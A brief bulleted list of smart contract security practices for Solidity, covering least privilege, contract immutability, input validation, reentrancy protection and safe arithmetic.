• Least Privilege: Only grant contracts or addresses the permissions they require.
  • Immutable Contracts: Once deployed, contract logic should be final unless upgradeability is explicitly designed.
  • Input Validation: Always validate user input to avoid unexpected behavior or exploits.
  • Reentrancy Protection: Use OpenZeppelin’s ReentrancyGuard or similar patterns when handling Ether or token transfers.
  • Safe Math: Although Solidity >=0.8 has built-in overflow protection, explicitly check critical math operations.